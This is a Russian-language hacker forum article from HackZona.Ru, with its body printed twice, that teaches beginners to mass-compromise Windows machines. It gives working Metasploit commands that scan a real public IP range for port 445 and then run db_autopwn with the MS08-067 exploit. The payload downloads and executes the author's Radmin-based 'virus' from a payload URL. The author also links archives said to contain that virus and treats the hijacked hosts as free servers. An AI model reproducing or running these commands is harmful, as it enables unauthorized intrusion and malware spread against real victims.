The Beggining — HackZona.Ru
The Beggining
The Beggining
Тип статьи:
Со старой ХакЗоны.
hi всем, мой ник ZIZ
Если честно я относительно новичок в хакинге, но решил попробовать написать статью а возможно и серию если вам понравиться
Причина в том, что судя по другим статьям, чисто обучения нет, есть практические приёмы и секреты, по которым можно выпендреться перед друзьями взломав древний сайт с уязвимостями скриптов(есть исключения)
Но взломав этот сайт по инструкции ты не будешь понимать принципа работы уязвимости, так вот я попытаюсь составить план обучения для новичков, от a до я, кидая ссылки, давая задания, а чтобы вам не становилось скучно иногда буду про хакерские секреты и писать
Сразу скажу что хакерство это целая наука, и местами нужно учить как в школе или универе)
И так начну)
урок 1 практика
использование ms08_067 для массрутинга и массовой заливки своего вируса(многое взял из журнала хакер, но довёл до работы).По идее у вас будет несколько дедиков, в зависимости от диапазона ip
и так, вам понадобиться:
-metasploit framework с оф сайта
-этот архив с исправлениями для metasploita, вирусом написанным мною и основанном на радмине, картинки процесса
narod.ru/disk/14499386000/The%20beggining.rar.html
letitbit.net/download/5661.5916aae45b0f86b20736b3a73/The_beggining.rar.html
-место куда залить вирус, чтобы была прямая ссылка
-клиент радмина с оф сайта
вроде всё)
Приготовления:
1)
скачиваем
-metasploit framework 3.2 именно 3.2
-radmin client выше 3)
-мой архив
Устанавливаем метсаплоит(полную установку с nmap) и патчим его патчами из архива. инструкция внутри)Хд
2)
ищем хостинг куда можно закинуть hz.exe(radmin)
я у себя сервер поставил
надо так, чтобы при нажатии на ссылку сразу закачка начиналась, так что letitbit не то)
Действия:
1)узнаём свой внешний ip: ziz.h18.ru/ip.php мой сайт, так что юзайте на здоровье
2)запускаем метасплоит
на верху windows>console
пишем
load db_sqlite3 загружает библиотеку
db_create создаёт базу данных
db_nmap -sT -PN -PS445 -p445 87.117.180-190.* сканирует хосты на наличие открытых 445 tcp портов(не советую слишком большой диапазон брать, времени много займёт, как у меня основываясь на своём сделайте). ждём минут 5, покажется что зависло всё, но это не так)
setg URL 172.16.1.10/hz.exe это задаст параметр который отвечает за то, откуда нагрузка скачает вирус
db_autopwn -e -p -P windows/download_exec/bind_tcp -m ms08_067 это всё запустит, через какое то время в module output появяться шеллы, на них ip написан, на них и коннектимся радмином))))либо просто кликните на них и ручками всё сделайте)чисто фантазия уже)))
эту уязвимость использовал conficer(крупнейший botnet)
домашнее задание хд:
fatetek.net
там есть lessons — их попроходить, они старые и многое уже не пашет, но всё же классный сайт
ещё скачайте оттуда игру fate и пройдите хотяб 2 уровня, сразу говорю, для этого надо пройти уроки lessons(5 штук)!!!
я кстати игру про хакерство делал)может скоро доделаю)
и пока не забыл!
мы с одним челом создали хак команду!webshadows!, если кто хочет в неё
пишите мне на mailagent
[email protected] или контакт
vkontakte.ru/id6097836
вот, всё)
пишите комменты, от вас зависит буду ли я ещё писать)
спасибо за внимание
Если честно я относительно новичок в хакинге, но решил попробовать написать статью а возможно и серию если вам понравиться
Причина в том, что судя по другим статьям, чисто обучения нет, есть практические приёмы и секреты, по которым можно выпендреться перед друзьями взломав древний сайт с уязвимостями скриптов(есть исключения)
Но взломав этот сайт по инструкции ты не будешь понимать принципа работы уязвимости, так вот я попытаюсь составить план обучения для новичков, от a до я, кидая ссылки, давая задания, а чтобы вам не становилось скучно иногда буду про хакерские секреты и писать
Сразу скажу что хакерство это целая наука, и местами нужно учить как в школе или универе)
И так начну)
урок 1 практика
использование ms08_067 для массрутинга и массовой заливки своего вируса(многое взял из журнала хакер, но довёл до работы).По идее у вас будет несколько дедиков, в зависимости от диапазона ip
и так, вам понадобиться:
-metasploit framework с оф сайта
-этот архив с исправлениями для metasploita, вирусом написанным мною и основанном на радмине, картинки процесса
narod.ru/disk/14499386000/The%20beggining.rar.html
letitbit.net/download/5661.5916aae45b0f86b20736b3a73/The_beggining.rar.html
-место куда залить вирус, чтобы была прямая ссылка
-клиент радмина с оф сайта
вроде всё)
Приготовления:
1)
скачиваем
-metasploit framework 3.2 именно 3.2
-radmin client выше 3)
-мой архив
Устанавливаем метсаплоит(полную установку с nmap) и патчим его патчами из архива. инструкция внутри)Хд
2)
ищем хостинг куда можно закинуть hz.exe(radmin)
я у себя сервер поставил
надо так, чтобы при нажатии на ссылку сразу закачка начиналась, так что letitbit не то)
Действия:
1)узнаём свой внешний ip: ziz.h18.ru/ip.php мой сайт, так что юзайте на здоровье
2)запускаем метасплоит
на верху windows>console
пишем
load db_sqlite3 загружает библиотеку
db_create создаёт базу данных
db_nmap -sT -PN -PS445 -p445 87.117.180-190.* сканирует хосты на наличие открытых 445 tcp портов(не советую слишком большой диапазон брать, времени много займёт, как у меня основываясь на своём сделайте). ждём минут 5, покажется что зависло всё, но это не так)
setg URL 172.16.1.10/hz.exe это задаст параметр который отвечает за то, откуда нагрузка скачает вирус
db_autopwn -e -p -P windows/download_exec/bind_tcp -m ms08_067 это всё запустит, через какое то время в module output появяться шеллы, на них ip написан, на них и коннектимся радмином))))либо просто кликните на них и ручками всё сделайте)чисто фантазия уже)))
эту уязвимость использовал conficer(крупнейший botnet)
домашнее задание хд:
fatetek.net
там есть lessons — их попроходить, они старые и многое уже не пашет, но всё же классный сайт
ещё скачайте оттуда игру fate и пройдите хотяб 2 уровня, сразу говорю, для этого надо пройти уроки lessons(5 штук)!!!
я кстати игру про хакерство делал)может скоро доделаю)
и пока не забыл!
мы с одним челом создали хак команду!webshadows!, если кто хочет в неё
пишите мне на mailagent
[email protected] или контакт
vkontakte.ru/id6097836
вот, всё)
пишите комменты, от вас зависит буду ли я ещё писать)
спасибо за внимание
5 комментариев
Но есть маленькие неполадки...куда ставить патчи -metasploit framework 3.2 ??Чёт не нашел там таких папок которые указаны там...
попробуй в поиске